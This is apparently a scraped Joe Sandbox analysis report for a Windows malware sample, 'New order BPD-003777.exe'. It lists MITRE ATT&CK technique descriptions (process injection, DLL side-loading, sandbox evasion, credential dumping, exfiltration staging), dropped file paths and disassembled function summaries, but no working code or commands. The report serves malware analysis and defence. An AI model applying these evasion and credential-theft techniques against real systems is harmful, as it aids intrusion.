Instruction Fuzzy Hash: 94416C70A28B088FDB54DF58D8856DEBBF4FB88704F10062EE88A93241DB35E545CBC6

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report New order BPD-003777.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\0507P35R

C:\Users\user\AppData\Local\Temp\proximobuccal

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
New order BPD-003777.exe

Function 002842DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 00283170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
timewindowregistryCOMMON

Function 002842A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 0028344D Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 201
registryCOMMON

Function 00282B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 00282CD4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53
registrywindowclipboardCOMMON

Function 0146D758 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00282C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 0146D4E8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 158
fileCOMMON

Function 002810F3 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 153
comCOMMON

Function 004277B0 Relevance: 7.7, APIs: 5, Instructions: 206
librarymemoryloaderCOMMON

Function 00283B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Function 0146C3D8 Relevance: 6.7, APIs: 4, Instructions: 720
processthreadCOMMON

Function 00283923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
windowCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre